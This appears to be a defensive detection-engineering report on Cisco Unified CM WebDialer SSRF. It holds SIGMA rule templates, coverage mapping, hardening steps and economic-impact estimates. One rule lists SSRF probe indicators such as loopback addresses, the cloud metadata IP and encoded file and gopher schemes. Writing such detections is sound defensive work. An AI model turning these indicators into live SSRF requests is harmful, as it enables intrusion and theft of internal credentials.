Use the SIGMA WebDialer rule to generate upstream suspicious activity candidates. Use the SIGMA rare egress rule and SIGMA control-plane change rule to generate follow-on candidates. Perform the time-bound correlation in the backend SIEM, not in SIGMA syntax.

Do not deploy these templates as raw one-to-one production alerts without local enrichment and suppression. Standalone matches may indicate vulnerability scanning, approved click-to-call workflows, provider support, monitoring, backup activity, patch validation, emergency remediation, or normal Cisco Unified CM administration.

Validate backend conversion for Splunk, Elastic, QRadar, Microsoft Sentinel, Chronicle, or the customer’s target detection platform before promotion. Confirm that field names, list operators, wildcard handling, case sensitivity, event categories, nested fields, and exception semantics survive conversion.

Validate that backend correlation uses a stable Cisco Unified CM scope across Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment. Do not correlate unrelated WebDialer events and unrelated administrative changes only because they occur in the same time range.

Run the converted rules in hunt mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, vulnerability scanning, provider-managed access, patch validation, certificate management, route-plan changes, service restarts, cluster maintenance, backup activity, and expected voice-platform egress.

Treat field mapping, enrichment creation, backend conversion validation, exception-list quality, time-window tuning, false-positive testing, and backend correlation readiness as required local deployment work.

DRI Assessment

Moderate to high resilience where SIGMA conversion maps cleanly to local web, network, administrative, service-state, file-integrity, and route-plan telemetry with reliable Cisco Unified CM enrichment. Resilience is lower where URI visibility, Unified CM administrative telemetry, rare-egress baselines, or stable Cisco Unified CM scope enrichment is unavailable.

DRI

8.0 / 10

TCR Assessment

Operational confidence is moderate for standalone converted SIGMA matches and high when backend SIEM correlation links WebDialer suspicious activity to rare Unified CM egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

7.8 / 10

Full-Telemetry TCR

8.9 / 10

Limitations

SIGMA does not provide native production-grade temporal correlation across independent event streams. Backend SIEM correlation, enrichment, exception handling, and time-window logic are required. These rules depend on local field mapping, URI-preserving WebDialer telemetry, Cisco Unified CM asset enrichment, WebDialer enablement enrichment, administrative audit visibility, rare-egress baselines, control-plane telemetry, and backend conversion quality. Legitimate click-to-call workflows, provider support, monitoring, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

SIGMA event-rule templates for Cisco Unified CM / Unified CM SME WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change. These templates are backend-convertible event rules. The production correlation between WebDialer suspicious activity and follow-on rare egress or control-plane change must be implemented in the target SIEM using local time windows, Cisco Unified CM scope enrichment, exception lists, and backend-native correlation logic.

title: Cisco Unified CM WebDialer Suspicious Activity

id: 74ddfe31-b5ce-4b03-a0db-b8e91cf6b801

status: test

description: Detects suspicious Cisco Unified CM or Unified CM SME WebDialer activity that may indicate SSRF-shaped request behavior, abnormal WebDialer endpoint access, suspicious source context, backend fetch behavior, or request normalization anomalies.

references:

  - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/

author: CyberDax

date: 2026-06-24

logsource:

  category: webserver

detection:

  selection_cucm_asset:

    labels.is_cucm_asset: true

    labels.webdialer_enabled: true

  selection_webdialer_path:

    url.path|contains:

      - "webdialer"

      - "WebDialer"

      - "wdservlet"

      - "clicktocall"

  selection_webdialer_event:

    labels.webdialer_event_type:

      - "abnormal_webdialer_access"

      - "webdialer_request_from_unapproved_source"

      - "webdialer_access_outside_click_to_call_workflow"

      - "webdialer_backend_fetch_behavior"

      - "webdialer_response_anomaly"

      - "webdialer_failure_to_success_pattern"

      - "suspicious_source_to_voice_management_plane"

  selection_ssrf_indicator:

    labels.ssrf_request_indicator: true

  selection_request_indicator:

    url.query|contains:

      - "127.0.0.1"

      - "localhost"

      - "0.0.0.0"

      - "169.254.169.254"

      - "://"

      - "%3a%2f%2f"

      - "%3A%2F%2F"

      - "file%3a"

      - "file%3A"

      - "gopher%3a"

      - "gopher%3A"

      - "%68%74%74%70"

      - "%68%74%74%70%73"

  selection_source_risk:

    labels.webdialer_source_risk: true

  selection_reputation_risk:

    labels.webdialer_reputation_risk: true

  filter_approved_change:

    labels.is_approved_change: true

  filter_approved_workflow:

    labels.is_approved_webdialer_workflow: true

  filter_approved_maintenance:

    labels.is_approved_maintenance_or_incident_response: true

  condition: selection_cucm_asset and (selection_webdialer_path or selection_webdialer_event or selection_ssrf_indicator or selection_request_indicator or selection_source_risk or selection_reputation_risk) and not 1 of filter_*

fields:

  - labels.cucm_scope

  - host.name

  - source.ip

  - http.request.method

  - url.path

  - url.query

  - url.full

  - http.response.status_code

  - user_agent.original

  - labels.webdialer_event_type

  - labels.ssrf_request_indicator

falsepositives:

  - Approved WebDialer click-to-call workflows

  - Approved call-management integrations

  - Approved provider support

  - Approved vulnerability scanning

  - Approved patch validation

  - Approved monitoring activity

level: medium

tags:

  - attack.initial-access

  - attack.t1190

---

title: Cisco Unified CM Rare Egress From Voice Control-Plane Asset

id: e8b27c1c-3216-4cf4-81a6-0976f2a4e002

status: test

description: Detects rare or unapproved outbound communication from Cisco Unified CM, Unified CM SME, or related voice-management assets that may support post-WebDialer exploitation correlation in the backend SIEM.

references:

  - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/

author: CyberDax

date: 2026-06-24

logsource:

  category: network_connection

detection:

  selection_cucm_asset:

    labels.is_cucm_asset: true

  selection_rare_egress:

    labels.is_rare_cucm_egress: true

  selection_egress_event:

    labels.rare_egress_event_type:

      - "rare_outbound_connection"

      - "unexpected_external_egress"

      - "unexpected_dns_resolution"

      - "connection_to_unapproved_destination"

      - "connection_to_unknown_reputation_destination"

      - "connection_to_suspicious_reputation_destination"

      - "egress_not_in_voice_platform_baseline"

  selection_destination_reputation:

    labels.destination_reputation:

      - "unknown"

      - "suspicious"

      - "malicious"

  filter_approved_change:

    labels.is_approved_change: true

  filter_approved_destination:

    labels.is_approved_egress_destination: true

  filter_approved_maintenance:

    labels.is_approved_maintenance_or_incident_response: true

  condition: selection_cucm_asset and selection_rare_egress and (selection_egress_event or selection_destination_reputation) and not 1 of filter_*

fields:

  - labels.cucm_scope

  - host.name

  - source.ip

  - destination.ip

  - destination.domain

  - destination.port

  - network.transport

  - labels.rare_egress_event_type

  - labels.destination_reputation

falsepositives:

  - Approved Cisco support activity

  - Approved monitoring activity

  - Approved backup activity

  - Approved patch validation

  - Approved DNS, NTP, directory, certificate, or provider destinations

  - Approved emergency remediation

level: high

tags:

  - attack.command-and-control

  - attack.t1105

---

title: Cisco Unified CM Control-Plane Change On Voice Platform Asset

id: 43e4942a-759c-40b5-84ab-935ca1b0e003

status: test

description: Detects suspicious Cisco Unified CM or Unified CM SME control-plane changes that may support post-WebDialer exploitation correlation in the backend SIEM.

references:

  - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/

author: CyberDax

date: 2026-06-24

logsource:

  category: application

detection:

  selection_cucm_asset:

    labels.is_cucm_asset: true

  selection_control_change:

    labels.is_cucm_control_plane_change: true

  selection_control_event:

    labels.control_event_type:

      - "cucm_file_created"

      - "cucm_file_modified"

      - "cucm_service_restart"

      - "cucm_administrative_configuration_change"

      - "cucm_route_plan_change"

      - "cucm_call_routing_change"

      - "new_cucm_administrator_created"

      - "cucm_administrator_modified"

      - "management_login_from_new_source"

      - "unusual_cluster_communication"

      - "voice_service_instability"

      - "unexpected_shell_activity"

  filter_approved_change:

    labels.is_approved_change: true

  filter_approved_change_type:

    labels.is_approved_change_type: true

  filter_approved_maintenance:

    labels.is_approved_maintenance_or_incident_response: true

  condition: selection_cucm_asset and selection_control_change and selection_control_event and not 1 of filter_*

fields:

  - labels.cucm_scope

  - host.name

  - source.ip

  - user.name

  - event.action

  - file.path

  - process.command_line

  - labels.control_event_type

  - labels.service_name

  - labels.service_action

  - labels.route_plan_object

  - labels.call_routing_change

falsepositives:

  - Approved Cisco patching

  - Approved service restart

  - Approved route-plan change

  - Approved certificate management

  - Approved provider support

  - Approved backup or restore activity

  - Approved incident response

level: high

tags:

  - attack.persistence

  - attack.t1505

  - attack.privilege-escalation

S26. Threat-to-Rule Traceability

Traceability Summary

The S25 detection set provides behavior-led coverage for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity and follow-on voice-control-plane compromise exposure. The rule set does not depend on a single IOC, exploit string, source IP, actor name, or one-off indicator. Coverage is built around suspicious WebDialer access, abnormal source and workflow context, backend-fetch or SSRF-shaped request behavior, rare Unified CM egress, administrative change, service-state change, file activity, route-plan or call-routing change, and voice-control-plane instability.

The detection model is strongest when WebDialer telemetry, Cisco Unified CM asset inventory, WebDialer enablement state, approved-source context, administrative audit telemetry, network egress telemetry, and control-plane change telemetry are normalized into a stable Cisco Unified CM scope. The completed S25 rule set supports direct detection, candidate generation, or backend correlation across NDR / Network Behavioral Analytics, SentinelOne, Splunk, Elastic, QRadar, and SIGMA.

Suspicious WebDialer and SSRF-Shaped Activity

This behavior is covered by rules that identify abnormal Cisco Unified CM / Unified CM SME WebDialer access, WebDialer requests from unapproved sources, access outside approved click-to-call workflows, SSRF-shaped request indicators, backend-fetch behavior, response anomalies, failure-to-success request patterns, and suspicious source-to-voice-management-plane activity.

·        NDR / Network Behavioral Analytics provides direct network and management-plane behavioral coverage for suspicious WebDialer access, abnormal source context, backend-fetch behavior, response anomalies, and suspicious voice-management-plane access patterns.

·        Splunk provides summary-backed correlation for suspicious WebDialer activity using WebDialer candidate summaries, approved-source lookups, source reputation context, and bounded follow-on timing.

·        Elastic provides transform-backed KQL candidate filters and EQL correlation using WebDialer enablement, Cisco Unified CM asset enrichment, SSRF request indicators, source-risk labels, and WebDialer event-type labels.

·        QRadar provides CRE building-block coverage for Cisco Unified CM WebDialer suspicious activity and WebDialer-enabled asset context.

·        SIGMA provides backend-convertible event-rule templates for suspicious WebDialer activity that can generate upstream candidates for SIEM-native correlation.

·        SentinelOne provides conditional endpoint-visible or adjacent-host coverage where WebDialer follow-on activity is observable through endpoint, management-host, reverse-proxy, monitoring, file-integrity, or appliance-adjacent telemetry.

Abnormal Source, Workflow, and Change Context

This behavior is covered by rules that distinguish suspicious WebDialer use from approved click-to-call workflows, provider support, vulnerability scanning, monitoring, patch validation, maintenance, backup activity, certificate management, route-plan changes, service restarts, and emergency remediation.

·        NDR / Network Behavioral Analytics supports approved-source, workflow, and change-context suppression where network identity, source reputation, maintenance context, and service ownership are available.

·        Splunk supports approved-source, approved-admin, reputation, maintenance, and baseline filtering through lookups, macros, and summary correlation.

·        Elastic supports approved-source, approved-change, approved-egress, and approved-maintenance context through enrichment policies, value lists, exception lists, and transform-backed labels.

·        QRadar supports approved workflow, provider support, scanner, maintenance, egress, and incident-response suppression through building blocks, reference sets, reference maps, and offense logic.

·        SIGMA supports suppression candidates through mapped enrichment fields and backend exception lists after conversion.

·        SentinelOne supports allowlisting and suppression for approved maintenance, support activity, monitoring, backup, certificate management, and provider-managed activity where those contexts are mapped into tenant-visible fields.

Rare Unified CM and Unified CM SME Egress

This behavior is covered by rules that identify rare outbound communication, unexpected external egress, unapproved destinations, suspicious or unknown destination reputation, unexpected DNS activity, and egress not present in the voice-platform baseline.

·        NDR / Network Behavioral Analytics provides direct behavioral coverage for rare or abnormal outbound communication from Cisco Unified CM nodes, Unified CM SME nodes, backend hosts, management interfaces, NAT egress identities, and voice-management segments.

·        Splunk provides summary-backed correlation between suspicious WebDialer candidates and valid rare-egress follow-on events occurring after the upstream WebDialer activity and within the configured rare-egress window.

·        Elastic provides EQL sequence correlation between suspicious WebDialer candidates and rare Unified CM egress candidates using a stable Cisco Unified CM scope field.

·        QRadar provides CRE correlation between WebDialer suspicious activity and rare Cisco Unified CM egress using building blocks, reference sets, reference maps, and bounded CRE windows.

·        SIGMA provides a backend-convertible rare-egress event template that can generate follow-on candidates for SIEM-native correlation.

·        SentinelOne provides conditional coverage for process-network connections or rare endpoint egress where Unified CM assets, management hosts, reverse proxies, monitoring hosts, or adjacent systems expose relevant endpoint telemetry.

Administrative and Voice-Control-Plane Change

This behavior is covered by rules that identify suspicious administrative configuration change, abnormal management login, administrator creation or modification, service restart, service manipulation, route-plan change, call-routing change, unusual cluster communication, voice-service instability, and related control-plane activity.

·        NDR / Network Behavioral Analytics supports behavioral correlation between suspicious WebDialer activity and downstream voice-control-plane changes where administrative, management-plane, cluster, service-state, or egress telemetry is visible.

·        Splunk provides summary-backed correlation between suspicious WebDialer candidates and valid control-plane change follow-on events occurring after the upstream WebDialer activity and within the configured control-plane change window.

·        Elastic provides EQL sequence correlation between suspicious WebDialer candidates and Unified CM control-plane change candidates using transform-backed enrichment labels and stable Cisco Unified CM scope.

·        QRadar provides CRE correlation between WebDialer suspicious activity and Cisco Unified CM control-plane change building blocks, including suspicious control-plane change context and approved-change suppression.

·        SIGMA provides a backend-convertible control-plane change event template that can generate follow-on candidates for SIEM-native correlation.

·        SentinelOne provides conditional endpoint-visible coverage for file modification, service manipulation, process execution, scheduled job creation, local user modification, credential or key access, and configuration-file access where those activities are visible on endpoint-managed or adjacent systems.

File, Service, Route-Plan, and Call-Routing Impact

This behavior is covered by rules that identify file creation, file modification, permission change, service restart, service modification, route-plan change, call-routing change, backup export activity, certificate or key access, and other high-risk artifacts that may indicate appliance-side compromise or operational impact.

·        SentinelOne provides the strongest host-level conditional coverage where endpoint or adjacent-host telemetry captures file, service, process, user, credential, key, configuration, or network-connection activity.

·        Splunk, Elastic, and QRadar provide strong correlation when file-integrity, service-state, administrative audit, route-plan, call-routing, and configuration-change telemetry are normalized into candidate summaries, transforms, custom properties, building blocks, or enrichment fields.

·        NDR / Network Behavioral Analytics provides supporting behavioral visibility where these changes produce observable management-plane, cluster, egress, or service-state network patterns.

·        SIGMA provides event-rule templates for backend candidate generation, but final impact correlation must occur in the target SIEM after conversion.

Voice-Service Instability and Appliance-Side Compromise Indicators

This behavior is covered by rules that identify voice-service instability, unexpected shell activity, service manipulation, file-write behavior, unauthorized administrator activity, abnormal cluster communication, rare egress, and control-plane change following suspicious WebDialer activity.

·        NDR / Network Behavioral Analytics supports network-visible instability, abnormal cluster communication, suspicious management-plane access, and rare egress.

·        SentinelOne supports endpoint-visible or adjacent-host compromise indicators where appliance-side or supporting-host telemetry is available.

·        Splunk supports post-WebDialer correlation across rare egress and control-plane change summaries, with severity escalation when multiple paths converge.

·        Elastic supports transform-backed and EQL-based correlation across WebDialer, rare egress, and control-plane change candidates.

·        QRadar supports CRE offense creation and offense severity or credibility escalation when WebDialer suspicious activity, rare egress, and control-plane change converge.

·        SIGMA supports candidate generation for each event family, with backend SIEM correlation required for final compromise-path interpretation.

Coverage Boundaries

The S25 rule set does not claim universal direct exploit confirmation. A single suspicious WebDialer request, standalone rare egress event, or isolated administrative change should be treated as a candidate signal until correlated with asset context, WebDialer enablement, source reputation, approved workflow context, timing, administrative telemetry, egress baselines, or control-plane change evidence.

Coverage is reduced where Cisco Unified CM WebDialer telemetry is unavailable, URI paths and query strings are not preserved, Cisco Unified CM asset inventory is incomplete, WebDialer enablement state is unknown, administrative audit logs are missing, rare-egress baselines are immature, endpoint visibility is unavailable, or a stable Cisco Unified CM scope cannot be created across network, endpoint, administrative, and control-plane telemetry.

AWS, Azure, GCP, and YARA were not included in S25 because the detection model is centered on Cisco Unified CM / Unified CM SME WebDialer and voice-control-plane appliance behavior. Cloud-only detections would be conditional downstream correlation without strong direct platform relevance, and YARA would require stable malware, webshell, script, or binary artifact evidence that is not established in this TTD.

Traceability Conclusion

The completed S25 detection set provides appropriate behavior-led traceability from Cisco Unified CM / Unified CM SME WebDialer suspicious activity to rare egress, administrative change, service manipulation, file activity, route-plan change, call-routing change, voice-service instability, and suspected appliance-side compromise. The strongest production outcome comes from combining NDR network behavior, Splunk and Elastic transform-backed correlation, QRadar CRE offense logic, SIGMA backend-convertible event candidates, and SentinelOne endpoint or adjacent-host visibility where available.

S29. Detection Coverage Summary

The S25 and S26 detection set provides behavior-led coverage for suspicious Cisco Unified CM / Unified CM SME WebDialer activity and follow-on voice-control-plane compromise exposure. Coverage is strongest when WebDialer access telemetry, Cisco Unified CM asset inventory, WebDialer enablement state, source reputation, rare egress telemetry, administrative audit logs, service-state logs, file-integrity logs, route-plan telemetry, and call-routing telemetry can be normalized into a stable Cisco Unified CM scope.

Direct Detection Coverage

Direct coverage is provided for suspicious WebDialer access patterns, abnormal source or workflow context, SSRF-shaped request indicators, backend-fetch behavior, rare Unified CM egress, suspicious administrative change, service restart, file modification, route-plan change, call-routing change, and voice-service instability where the relevant telemetry is available.

Correlation-Based Coverage

Correlation-based coverage is provided when suspicious WebDialer candidates can be tied to rare egress or control-plane changes within bounded timing windows. Splunk, Elastic, QRadar, and NDR provide the strongest correlation paths when candidate summaries, transforms, building blocks, reference sets, enrichment labels, and behavioral models are properly implemented.

Conditional Endpoint Coverage

SentinelOne coverage is conditional because Cisco Unified CM appliance endpoint visibility may vary by customer deployment. SentinelOne provides useful detection value where endpoint-visible or adjacent-host telemetry exists for Unified CM nodes, management hosts, reverse proxies, monitoring hosts, backup hosts, file-integrity collectors, or voice-management support systems.

Backend Candidate Coverage

SIGMA provides backend-convertible event-rule templates for WebDialer suspicious activity, rare egress, and control-plane change. SIGMA does not provide native temporal correlation by itself. Backend SIEM correlation is required for final WebDialer-to-follow-on detection logic.

Non-Coverage Conditions

The S25 detection set does not provide direct AWS, Azure, GCP, or YARA coverage. Cloud detections would be conditional downstream correlation without strong direct platform relevance, and YARA would require stable malware, script, webshell, or binary artifact evidence that is not established in this TTD.

S33. Defensive Control & Hardening Improvements

Patch and Exposure Reduction

Apply Cisco-provided fixed software for affected Cisco Unified CM / Unified CM SME systems. Where WebDialer is not required, disable it. Where WebDialer is required, restrict access to approved call-management integrations, approved user workflows, approved management networks, and approved provider-support paths.

Access Control

Limit WebDialer access to trusted internal sources and approved integrations. Restrict reverse-proxy, load-balancer, VPN, and management access paths. Require change-control review for externally reachable or provider-managed WebDialer exposure.

Segmentation

Segment Cisco Unified CM / Unified CM SME nodes, management interfaces, voice-management networks, backup systems, monitoring systems, and provider-support access paths. Limit outbound egress from voice-control-plane assets to approved destinations only.

Logging and Telemetry

Preserve URI path, query string, source IP, forwarded source IP, HTTP method, response status, user-agent, virtual host, backend host, and destination context for WebDialer traffic. Forward Cisco Unified CM administrative audit logs, service-state telemetry, route-plan changes, call-routing changes, configuration changes, file-integrity events, and backup/export activity to detection platforms.

Egress Control

Baseline and restrict outbound communication from Cisco Unified CM / Unified CM SME assets, management interfaces, NAT egress identities, and voice-management segments. Alert on rare destinations, unknown reputation destinations, suspicious reputation destinations, unexpected DNS activity, and egress outside approved service dependencies.

Administrative Control

Review Unified CM administrator accounts, provider-support accounts, service accounts, route-plan permissions, call-routing change permissions, certificate-management access, backup access, and emergency-remediation procedures. Monitor administrator creation, administrator modification, unusual management login, route-plan changes, service restarts, and configuration changes.

Change-Control Integration

Integrate approved maintenance windows, approved provider support, approved vulnerability scanning, approved monitoring, approved route-plan changes, approved service restarts, approved certificate management, approved backup activity, and approved emergency remediation into detection exceptions. Exceptions should be time-bound, source-bound, and asset-bound.

Recovery Readiness

Validate restore procedures, configuration backups, route-plan recovery, service restart procedures, cluster health checks, call-routing validation, certificate recovery, and communications continuity plans. Treat voice-control-plane recovery as a business-continuity requirement, not only an infrastructure task.

S39. Economic Impact & Organizational Exposure

Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane appliance compromise exposure creates organizational risk by increasing uncertainty around communications infrastructure trust, WebDialer access, backend request behavior, voice-management egress, administrative integrity, route-plan integrity, call-routing integrity, service-state reliability, appliance-side file activity, provider-managed access, contact-center continuity, executive communications, emergency coordination, and incident-response communications. Exposure rises when suspicious activity affects Cisco Unified CM / Unified CM SME environments supporting internal telephony, customer support, contact-center routing, regulated communications, emergency notification, business-continuity coordination, legal or executive communications, or operational workflows that depend on trusted voice-control-plane availability.

Estimated Economic Exposure

Estimated exposure should be treated as scenario-based rather than fixed. The most defensible enterprise estimate is tied to whether activity remains attempted or low-scope WebDialer abuse, becomes confirmed or strongly suspected Cisco Unified CM / Unified CM SME compromise, or expands into rare appliance egress, unauthorized administrative activity, route-plan manipulation, call-routing change, file or service manipulation, sensitive configuration exposure, sustained voice-service disruption, contact-center impact, customer communications interruption, legal review, regulatory assessment, cyber-insurance scrutiny, executive reporting, or board-level communications-infrastructure trust restoration.

Low Impact Scenario

Estimated exposure: $85,000 to $275,000

This scenario applies when rapid investigation confirms suspicious WebDialer activity, scanning, exploitation attempts, or candidate SSRF-shaped requests without evidence of rare Unified CM egress, unauthorized administrator activity, route-plan change, call-routing manipulation, service restart, file modification, sensitive configuration access, backup exposure, certificate or key access, voice-service instability, or appliance-side compromise. Activity may involve abnormal WebDialer access, unapproved source context, unusual request parameters, reverse-proxy alerts, WAF events, failed request patterns, vulnerability scanning, or early exploit probing, but WebDialer access logs, reverse-proxy telemetry, load-balancer logs, firewall logs, DNS logs, administrative audit records, service-state telemetry, route-plan telemetry, file-integrity telemetry, and change-control records support a failed, contained, or non-impacting event.

Response remains limited to emergency exposure review, patch validation, WebDialer restriction or disablement, approved-source validation, firewall and proxy log review, Unified CM administrative audit review, route-plan and call-routing validation, service-state review, targeted detection deployment, short-term monitoring, and executive assurance that communications control-plane integrity remains intact.

Moderate Impact Scenario

Estimated exposure: $275,000 to $950,000

This scenario applies when suspicious WebDialer activity is confirmed or strongly suspected and follow-on evidence creates uncertainty around Cisco Unified CM / Unified CM SME integrity. Follow-on evidence may include rare Unified CM egress, abnormal management-plane activity, suspicious administrative activity, service restart, file modification, route-plan change, call-routing change, backup or export activity, certificate or key access, unusual cluster communication, or degraded confidence in voice-control-plane integrity.

The organization may not be able to immediately determine whether suspicious WebDialer activity resulted in unintended backend request behavior, appliance-side access, unauthorized configuration change, route-plan manipulation, call-routing impact, service-state disruption, sensitive configuration exposure, or persistence through administrative control. Response may require incident response, forensic triage, WebDialer exposure validation, Unified CM administrative audit reconstruction, route-plan review, call-routing verification, service validation, file-integrity review, egress review, vendor escalation, change rollback, contact-center assurance, helpdesk coordination, executive reporting, and enhanced monitoring across voice-management infrastructure.

High Impact Scenario

Estimated exposure: $950,000 to $4.2 million

This scenario applies when WebDialer SSRF or adjacent Cisco voice-platform compromise becomes an enterprise-impact event involving confirmed appliance-side compromise, unauthorized administrator creation, malicious route-plan or call-routing modification, service manipulation, file-write activity, command execution, sensitive configuration exposure, certificate or key exposure, backup exposure, sustained voice-service disruption, contact-center interruption, customer-support degradation, emergency communications impact, or loss of trust in Cisco Unified CM / Unified CM SME control-plane integrity.

The organization may need to assume that voice-control-plane systems, route-plan objects, call-routing workflows, administrative access, service state, and communications continuity were affected until audit evidence proves otherwise. Response may require extended incident response, appliance rebuild or rollback, configuration restoration, call-routing reconstruction, route-plan validation, cluster health validation, certificate and key review, backup integrity validation, provider-support review, legal and regulatory review, cyber-insurance coordination, communications planning, customer-impact management, executive and board reporting, and formal validation that enterprise voice-control-plane trust can safely resume.

Annualized Risk Exposure

Estimated annualized exposure is highest for materially exposed enterprise environments with broad Cisco Unified CM / Unified CM SME dependency, WebDialer-enabled services, externally reachable or provider-managed access paths, incomplete URI or query retention, weak segmentation, immature rare-egress baselines, incomplete administrative audit telemetry, limited route-plan monitoring, insufficient service-state visibility, unclear provider-support access, or inconsistent voice-control-plane recovery procedures.

Exposure may reach the high-impact range where suspicious WebDialer activity or adjacent Cisco voice-platform exploitation results in confirmed or suspected appliance-side compromise, unauthorized administrator activity, route-plan manipulation, call-routing change, sensitive configuration exposure, certificate or key access, service disruption, contact-center impact, emergency communications risk, customer-support interruption, cyber-insurance review, legal escalation, communications response, or board-level reporting.

Operational Dependency

Operational dependency is high where Cisco Unified CM / Unified CM SME supports enterprise voice routing, click-to-call workflows, customer-support lines, contact-center operations, executive communications, emergency coordination, incident-response communications, regulated communications, provider-managed voice operations, directory-integrated calling, and business-continuity workflows. Dependency increases when affected Unified CM nodes, SME nodes, clusters, route-plan objects, call-routing configurations, administrative accounts, service-state controls, management interfaces, or voice-management segments are required to sustain customer communication, support internal operations, coordinate emergency response, maintain contact-center availability, or preserve communications during containment and recovery.

Control Trust

Control trust is reduced when the organization cannot prove that WebDialer access, approved click-to-call workflows, source legitimacy, reverse-proxy routing, load-balancer behavior, firewall policy, voice-control-plane egress, administrative audit logs, route-plan changes, call-routing changes, service-state transitions, file-integrity records, provider-support activity, backup or export activity, and emergency remediation remained reliable during the event.

Control trust is further reduced when suspicious WebDialer activity cannot be tied to a stable Cisco Unified CM scope across node, cluster, backend host, management interface, NAT egress identity, administrator, or voice-management segment. Trust is also reduced when approved provider support, vulnerability scanning, monitoring, patch validation, backup activity, certificate management, route-plan changes, service restarts, or emergency remediation cannot be distinguished from suspicious post-exploitation behavior.

Visibility Confidence

Visibility confidence is highest when WAF logs, reverse-proxy logs, load-balancer logs, firewall logs, proxy logs, DNS logs, NDR telemetry, Cisco Unified CM / Unified CM SME access logs, administrative audit logs, service-state telemetry, configuration-change telemetry, route-plan telemetry, call-routing telemetry, file-integrity telemetry, endpoint-adjacent telemetry, backup or export records, provider-support records, change-control records, asset inventory, WebDialer enablement inventory, approved-source inventories, and egress baselines can be joined reliably.

Visibility confidence is reduced where URI paths and query strings are not preserved, forwarded-source identity is unreliable, NAT or reverse-proxy mapping cannot be tied back to the same Unified CM scope, WebDialer enablement state is unknown, administrative audit logs are missing, service-state telemetry is unavailable, route-plan changes are not monitored, file-integrity telemetry is absent, rare egress baselines are immature, endpoint visibility is unavailable, provider-support activity is undocumented, or timestamp normalization is inconsistent across detection sources.

Change-Control Confidence

Change-control confidence is high when WebDialer exposure decisions, patching activity, provider support, vulnerability scanning, monitoring, certificate management, backup activity, service restarts, route-plan changes, call-routing changes, cluster maintenance, emergency remediation, administrative account changes, and detection exceptions are documented and attributable. Confidence is reduced when change-control records are incomplete, delayed, inconsistent, unavailable, or disconnected from WebDialer logs, administrative audit telemetry, route-plan records, service-state telemetry, firewall logs, proxy logs, NDR telemetry, SIEM alerts, provider-support records, and incident-response evidence.

Downstream Dependency

Downstream dependency is high when Cisco Unified CM / Unified CM SME connects to directory services, contact-center platforms, SIP trunks, emergency calling workflows, collaboration platforms, helpdesk operations, customer-support systems, provider-managed services, backup infrastructure, monitoring tools, security operations workflows, executive communications, and incident-response communications. These dependencies increase the impact of even limited voice-control-plane uncertainty when call routing, route-plan integrity, administrator activity, service state, provider access, egress behavior, or communications availability cannot be validated quickly.

Customer and Regulatory Exposure

Customer and regulatory exposure increases when suspicious Cisco Unified CM / Unified CM SME activity may affect customer-support lines, contact-center routing, emergency communications, regulated communications, healthcare coordination, financial operations, legal communications, executive communications, incident-response coordination, or availability of communications services. Exposure also increases when incomplete telemetry prevents timely confirmation of whether route-plan changes, call-routing changes, service restarts, administrative activity, configuration access, certificate or key access, backup or export activity, rare egress, or provider-managed access was legitimate, malicious, or caused by approved operational activity.

Residual Economic Risk

Residual economic risk remains after containment if the organization cannot prove that affected systems were patched, WebDialer exposure was restricted, approved access paths were validated, suspicious WebDialer activity was scoped, rare egress was reviewed, administrative access was audited, route-plan integrity was validated, call-routing behavior was confirmed, service state was restored, file-integrity findings were reviewed, sensitive configuration access was assessed, certificates and keys were validated, backups were checked, provider-support activity was reconciled, and voice-control-plane trust was restored.

Residual risk is highest where WebDialer telemetry, reverse-proxy logs, URI and query retention, administrative audit evidence, service-state telemetry, route-plan telemetry, call-routing telemetry, file-integrity evidence, rare-egress baselines, provider-support records, endpoint-adjacent telemetry, change-control evidence, or stable Cisco Unified CM scope mapping are incomplete.

Behavioral Coverage Assessment

This report’s behavioral detection model directly covers Cisco Unified CM / Unified CM SME WebDialer suspicious activity and follow-on voice-control-plane compromise behavior that aligns with WebDialer access abuse, SSRF-shaped request behavior, backend request abuse through trusted appliance context, rare Unified CM egress, suspicious administrative activity, service restart, service manipulation, file creation or modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, and suspected appliance-side compromise.

The report is behavior-led and should not be interpreted as limited to one exploit string, one source IP, one actor name, one proof-of-concept, one public advisory, one payload, one URL pattern, one product build, or one static IOC. The primary detection value is the ability to connect suspicious voice-management web activity to downstream voice-control-plane behavior, not merely to identify the presence of a numbered vulnerability.

CVE / KEV Coverage Assessment

This report directly maps to CVE-2026-20230 because the S25 detection model explicitly covers Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity and follow-on voice-control-plane behavior. Direct CVE mapping is appropriate where suspicious WebDialer activity, WebDialer enablement, affected Unified CM / Unified CM SME scope, SSRF-shaped request indicators, rare egress, administrative change, service activity, file activity, route-plan change, call-routing change, or voice-service instability are observable.

Coverage with adaptation applies to Cisco Unified Communications and adjacent Cisco voice-platform compromise vulnerabilities where the observable behavior overlaps this report’s voice-control-plane compromise model but the initial exploitation path is not WebDialer SSRF. CVE-2026-20045 is covered with adaptation because it affects Cisco Unified Communications products and can allow unauthenticated remote command execution on the underlying operating system of an affected device. The downstream behaviors may overlap this report’s detection model, including command execution, file activity, service manipulation, rare egress, administrative change, route-plan change, call-routing impact, or voice-service instability, but the upstream trigger requires amended logic because the exploit path is not the WebDialer SSRF path modeled as the primary entry condition in this TTD.

KEV status should remain a remediation and urgency signal, not a detection coverage proof. CVE-2026-20045 is represented in this coverage set with adaptation because it is a related Cisco Unified Communications KEV item whose downstream behavior may overlap this report’s voice-control-plane compromise model. This report should not represent a CVE as covered solely because it appears in KEV, public reporting, vendor advisories, exploit reporting, proof-of-concept reporting, or vulnerability roundups. A CVE should only be added when the affected component, exploitation mechanism, telemetry requirements, privilege model, affected workflow, impacted voice-platform function, and relationship to the report’s WebDialer-to-control-plane or voice-platform compromise model are validated.

Named Malware / Tooling / PhaaS Coverage

No named malware, tooling family, PhaaS platform, or named exploit toolkit is directly counted in this version.

